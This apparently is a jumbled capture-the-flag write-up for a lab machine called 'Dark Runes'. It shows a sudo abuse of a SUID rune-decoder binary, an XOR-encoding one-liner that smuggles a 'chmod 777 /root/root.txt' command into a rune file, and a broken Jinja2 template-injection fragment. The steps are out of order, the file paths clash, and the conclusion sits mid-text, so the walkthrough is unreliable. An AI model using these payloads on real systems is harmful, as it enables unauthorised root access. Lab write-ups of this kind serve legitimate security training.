
HTB Dark Runes May 2026

Payload:

```
sudo /usr/local/bin/rune_decoder /var/runes/evil.rune
```

Now read /root/root.txt directly.

rune_decoder is a SUID binary that decodes "rune files" (binary format). Analyze it with strings and ltrace.

Root flag acquired. 🏴‍☠️

| Phase | Technique |
|-------|------------|
| Web | Base64 rune encoding, token reuse, SSTI (Jinja2) |
| Shell | Python reverse shell, PostgreSQL access |
| Priv Esc | Custom binary analysis, XOR encryption bypass, sudo abuse |

🧙 Final Rune Reading

Dark Runes is a love letter to CTF players who enjoy creative encoding, sneaky template injection, and low-level binary trickery. It rewards patience and curiosity—traits of a true digital rune mage.

```
echo -n "RUNECMD:chmod 777 /root/root.txt" > payload
python3 -c 'print("".join(chr(ord(c) ^ 0x42) for c in open("payload").read()))' > /tmp/evil.rune
```

Move to /var/runes/evil.rune and run:

Payload: sudo /usr/local/bin/rune_decoder /var/runes/evil

SSH as admin with same password.

% with a=request a % endwith % uid=33(www-data) gid=33(www-data) groups=33(www-data)

Machine Difficulty: Medium
Category: Web, Cryptography, Binary Exploitation, Linux